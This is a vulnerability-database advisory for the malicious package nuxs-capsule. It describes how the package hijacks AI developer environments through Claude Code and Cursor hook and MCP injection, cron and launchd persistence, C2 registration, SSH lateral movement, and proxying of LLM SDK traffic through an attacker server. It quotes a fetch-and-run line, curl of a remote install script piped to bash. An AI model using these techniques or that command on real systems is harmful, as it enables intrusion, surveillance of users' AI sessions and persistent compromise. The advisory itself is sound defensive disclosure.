VDB
GCVE-110-OSM-2026-5111
GCVE-110-OSM-2026-5111
Advisory PublishedCVSS 9.6/10
Hijacks AI developer environments by registering the victim machine with a Socket.IO C2 at pixeldesk-api.onrender.com, intercepting every Claude Code tool call via injected hooks in ~/.claude/settings.json, and propagating laterally to all SSH-accessible servers by fetching and executing a remote shell script from pixeldesk.dev that installs a persistent systemd C2 agent. Proxies all Anthropic, OpenAI, and Google AI SDK traffic through the attacker's server by rewriting LLM base URL environment variables in shell rc files. Attacker admin panel at nuxs.ai/admin/capsule displays collected victim agent inventory.
**Trigger** (`setup` CLI, registered via `postinstall`): `nuxs-capsule setup` runs `dist/setup.js` which fingerprints the machine (SHA256 of MAC+hostname+platform+arch) and POSTs to the C2 license endpoint at pixeldesk-api.onrender.com.
**Agent inventory**: `dist/scan.js` and `dist/agents/register.js` enumerate all running AI tools (Claude Code, Cursor, Aider, Codex) via process list, config paths, and session env vars (`CLAUDE_CODE_SESSION_ID`, `OPENCLAW_SESSION`, `AIDER_SESSION`, `CODEX_SESSION`), then POST agent_kind, agent_label, agent_pid, config_path, binary_path, hostname, and machine_fingerprint to the agent registration endpoint.
**Hook injection**: `dist/setup.js:setupClaudeCode` writes `PreToolUse`, `UserPromptSubmit`, `SessionEnd`, and `SessionStart` hooks plus the `nuxs-capsule` MCP server into `~/.claude/settings.json`; `setupCursor` injects the same MCP server into `~/.cursor/mcp.json`.
**Persistence**: `setupLaunchdFlush` installs `~/Library/LaunchAgents/dev.nuxs.capsule.flush.plist` (macOS, 60s interval) or `setupCronFlush` adds `* * * * * nuxs-capsule flush` to crontab (Linux); each invocation POSTs batched telemetry to the C2.
**SSH lateral movement**: `dist/install.js:remoteInstall` reads `~/.ssh/config` and `~/.ssh/known_hosts` to enumerate hosts, then SSHes into each and pipes `curl https://pixeldesk.dev/install-linux.sh | bash` with attacker-supplied auth tokens.
**Stage-2 systemd implant**: `install-linux.sh` downloads `openclaw-bridge.js` or `hermes-bridge.js` from pixeldesk.ai (158 KB Socket.IO C2 bundles), installs to `/opt/nuxs/`, and creates a `nuxs-<kind>-<name>.service` systemd unit (WantedBy=multi-user.target, Restart=always). The bridge polls the intent endpoint every 12 seconds and supports server-pushed hot-swap via `nuxs_update` events.
**Stage-3 Claude Code bridge**: `connect.js` is a Claude Code-specific Socket.IO C2 variant, served when clientKind=claude_code is detected.
**LLM MitM**: `dist/setup.js:setupShellEnvs` (gated on NUXS_PROXY=1) appends attacker-controlled base URLs for Anthropic, OpenAI, and Google AI SDKs to shell rc files.
**Admin panel**: victim agent inventory is visible at https://nuxs.ai/admin/capsule (hardcoded in dist/scan.js).
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | nuxs-capsule | 0.1.41 (affected) | — |
Browse GCVE Records
73,442 records in the GCVE database · Updated July 17, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.